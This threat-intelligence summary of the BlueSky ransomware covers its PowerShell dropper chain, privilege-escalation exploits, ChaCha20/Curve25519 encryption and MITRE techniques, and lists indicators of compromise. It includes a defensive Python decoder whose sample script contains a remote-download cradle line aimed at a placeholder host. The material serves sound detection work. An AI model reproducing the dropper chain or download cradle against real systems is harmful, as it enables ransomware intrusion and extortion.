BlueSky Ransomware: Fast Encryption via Multithreading

BlueSky ransomware is an emerging Windows-focused family that uses multithreading to speed up file encryption and evade defenses. The analysis ties BlueSky to Conti v3 in code structure and network behavior, while its cryptography resembles Babuk (ChaCha20 with Curve25519); delivery relies on a PowerShell dropper, and infected hosts receive Bluesky-branded ransom notes. #BlueSkyRansomware #Conti #Babuk #RedLine #ChaCha20 #Curve25519 #PowerShell

Keypoints

  • BlueSky uses a multithreaded encryption architecture to accelerate file encoding on Windows hosts.
  • Code fingerprints show similarities to Conti v3 (notably in the network search module) and to Babuk in cryptographic approach (ChaCha20 with Curve25519).
  • The dropper chain starts with a PowerShell script (start.ps1) fetched from a remote site, decoding and loading payloads based on user privileges.
  • Privilege escalation hooks include JuicyPotato for older Windows versions and ghost.exe/spooler.exe to exploit CVE-2020-0796 and CVE-2021-1732.
  • The final ransomware payload is downloaded as l.exe, masquerades as javaw.exe, and encrypts files with a .bluesky extension while dropping ransom notes.
  • BlueSky includes several anti-analysis techniques (string/API encryption, DJB hashing) to hinder reverse engineering.
  • Artifacts include unique IDs, registry fingerprints, and a ChaCha20-based RECOVERY BLOB used in the encryption process.

MITRE Techniques

  • [T1059.001] PowerShell – Used to drop and download payloads via start.ps1; “The initial dropper is Base64-encoded and then DEFLATE-compressed” and “start.ps1 downloaded a number of payloads from hxxps://kmsauto[.]us/someone/ based on the user’s privileges.”
  • [T1105] Ingress Tool Transfer – Final payload downloaded from hxxps://kmsauto[.]us/someone/l.exe and saved as javaw.exe.
  • [T1548.001] Exploitation for Privilege Escalation – Uses JuicyPotato for older Windows versions and ghost.exe/spooler.exe for CVE-2020-0796 and CVE-2021-1732.
  • [T1036] Masquerading – Final payload renamed to javaw.exe to masquerade as a legitimate Windows application.
  • [T1486] Data Encrypted for Impact – Multithreaded file encryption using Curve25519 and ChaCha20, replacing original data and adding .bluesky extension.
  • [T1083] File and Directory Discovery – Network search module enumerates files on local drives and mounted network shares for encryption.
  • [T1027] Obfuscated/Compressed Files and Information – Anti-analysis techniques include string encryption, API obfuscation, and DJB hashing to hinder analysis.
  • [T1112] Modify Registry – Creates HKCU\Software entries, including RECOVERY BLOB and x25519_public, to fingerprint operations and store recovery data.
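The T1059.001 entry above describes the dropper as Base64-encoded and then DEFLATE-compressed, the usual shape of a PowerShell stage produced with a DeflateStream. The analyst helper below is an added example, not code from the Unit42 report or from the malware: it decodes such a blob (trying raw DEFLATE first, then zlib- and gzip-wrapped streams), pulls any URLs out of the recovered script, and defangs them for reporting. The sample script, its placeholder URL (example.invalid) and the blob built from it are constructed here for illustration and are not the real start.ps1.

```python
import base64
import re
import zlib


def decode_powershell_stage(blob: str) -> str:
    """Decode a Base64-encoded, DEFLATE-compressed PowerShell stage.

    PowerShell's IO.Compression.DeflateStream writes raw DEFLATE (no header),
    so that is tried first; zlib- and gzip-framed variants are tried next so
    the helper also handles stages built with other compression wrappers.
    """
    raw = base64.b64decode(blob.strip())
    for wbits in (-zlib.MAX_WBITS, zlib.MAX_WBITS, zlib.MAX_WBITS | 16):
        try:
            return zlib.decompress(raw, wbits).decode("utf-8", errors="replace")
        except zlib.error:
            continue
    raise ValueError("payload is not a DEFLATE, zlib or gzip stream")


# Rough URL matcher for triage output; stops at whitespace and quote/bracket chars.
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def extract_urls(script: str) -> list[str]:
    """Return the unique URLs referenced by a decoded script, sorted."""
    return sorted(set(URL_RE.findall(script)))


def defang(url: str) -> str:
    """Defang a URL for a report (http -> hxxp, '.' -> '[.]')."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def build_sample_blob(script: str) -> str:
    """Constructed test input: raw-DEFLATE a script and Base64-encode it,
    mirroring what a DeflateStream + ToBase64String pipeline would emit."""
    comp = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)
    data = comp.compress(script.encode("utf-8")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


# Constructed sample script (hypothetical, benign placeholder URL).
SAMPLE_SCRIPT = (
    "# constructed sample, not the real dropper\n"
    "$u = 'https://example.invalid/stage/payload.txt'\n"
    "$b = (New-Object Net.WebClient).DownloadString($u)\n"
)
SAMPLE_BLOB = build_sample_blob(SAMPLE_SCRIPT)


def triage(blob: str) -> list[str]:
    """Decode a stage and return its URLs in defanged form."""
    return [defang(u) for u in extract_urls(decode_powershell_stage(blob))]


if __name__ == "__main__":
    print(decode_powershell_stage(SAMPLE_BLOB))
    for indicator in triage(SAMPLE_BLOB):
        print("URL:", indicator)
```

Run it against a real sample by passing the Base64 text from the encoded dropper to decode_powershell_stage; the decoded script may itself embed further encoded stages, so the function is worth calling again on any Base64 strings it reveals.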

Indicators of Compromise

  • [Domain] kmsauto.us – Domain hosting BlueSky payloads and related downloader activity.
  • [URL] hxxps://kmsauto[.]us/someone/start.ps1 – Dropper location used to initiate the chain.
  • [URL] hxxps://kmsauto[.]us/someone/l.exe – Final ransomware payload download.
  • [Hash] [SHA256] BlueSky Ransomware Payloads – 2280898cb29faf1785e782596d8029cb471537ec38352e5c17cc263f1f52b8ef, 3e035f2d7d30869ce53171ef5a0f761bfb9c14d94d9fe6da385e20b8d96dc2fb
  • [Hash] [SHA256] Obfuscated PowerShell Downloader – 08f491d46a9d05f1aebc83d724ca32c8063a2613250d50ce5b7e8ba469680605
  • [Hash] [SHA256] PowerShell Downloader (decoded) – 969a4a55bb5cabc96ff003467bd8468b3079f5c95c5823985416c019eb8abe2f
  • [Hash] [SHA256] CVE-2020-0796 Privilege Escalation Exploit – c4e47cba1c5fedf9ba522bc2d2de54a482e0ac29c98358390af6dadc0a7d65ce
  • [Hash] [SHA256] JuicyPotato – cf64c08d97e6dfa5588c5fa016c25c4131ccc61b8deada7f9c8b2a41d8f5a32c
  • [Hash] [SHA256] CVE-2021-1732 Privilege Escalation Exploit – 6c94a1bc67af21cedb0bffac03019dbf870649a182e58cc5960969adf4fbdd48
  • [Hash] [SHA256] RedLine Infostealer Association – 58db85f0c86640b4c3a2584e9ef5696c526190faf87eaa19085737685bc9e7f5, 9ca0e858ff6f163a128fb699d2b801b6b13a2eb1d6cd995302effa5f587cd8d8, aecfc82fa44790e0533f0bece0a1ab0860b163838646aa0c019187a37326d477, be3e665d389e8b85ceda1e2fc80a41a247de27d1d0b13ee0c2574c1e36ebc6d4
  • [URL] Ransom Note URL – http://ccpyeuptrlatb2piua4ukhnhi7lrxgerrcrj4p2b5uhbzqm2xgdjaqid.onion
  • [File] Ransomware Extension – .bluesky (encrypted files)
  • [File] Ransom Note Filenames – # DECRYPT FILES BLUESKY #.txt, # DECRYPT FILES BLUESKY #.html
  • [Registry] HKCU\Software\completed, HKCU\Software\recoveryblob, HKCU\Software\x25519_public

Read more: https://unit42.paloaltonetworks.com/bluesky-ransomware/